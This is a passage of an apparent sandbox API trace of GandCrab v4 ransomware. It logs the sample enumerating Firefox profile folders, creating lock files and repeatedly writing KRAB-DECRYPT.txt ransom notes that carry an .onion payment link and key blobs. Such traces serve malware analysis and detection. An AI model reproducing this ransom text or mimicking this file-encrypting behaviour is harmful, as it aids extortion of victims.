(in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\\\KRAB-DECRYPT.txt") returned 111 [0078.824] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.841] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0078.841] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0078.842] CloseHandle (hObject=0x7ec) returned 1 [0078.842] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.843] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.843] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1a, wMilliseconds=0x2f)) [0078.843] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.843] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.843] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.844] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock") returned 117 [0078.844] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0078.844] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.844] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\") returned 94 [0078.845] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*" [0078.845] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xffea98 [0078.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.845] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.845] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.845] lstrcmpW (lpString1="archived", lpString2=".") returned 1 [0078.845] lstrcmpW (lpString1="archived", lpString2="..") returned 1 [0078.845] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="archived" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived" [0078.845] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\" [0078.845] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0078.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.846] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.846] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.847] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\\\KRAB-DECRYPT.txt") returned 120 [0078.847] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0078.850] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0078.850] WriteFile (in: hFile=0x720, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0078.851] CloseHandle (hObject=0x720) returned 1 [0078.851] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.852] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.852] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1a, wMilliseconds=0x2f)) [0078.852] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.852] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.852] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.853] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock") returned 126 [0078.853] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x720 [0078.853] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.853] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.854] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\") returned 103 [0078.854] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*" [0078.854] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0xffe4d8 [0078.854] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.854] FindNextFileW (in: hFindFile=0xffe4d8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0078.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.854] FindNextFileW (in: hFindFile=0xffe4d8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0078.854] lstrcmpW (lpString1="2017-05", lpString2=".") returned 1 [0078.854] lstrcmpW (lpString1="2017-05", lpString2="..") returned 1 [0078.854] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="2017-05" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05" [0078.854] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\" [0078.854] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0078.855] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.855] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.855] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.855] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.855] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.855] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.855] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\\\KRAB-DECRYPT.txt") returned 128 [0078.856] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0078.876] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 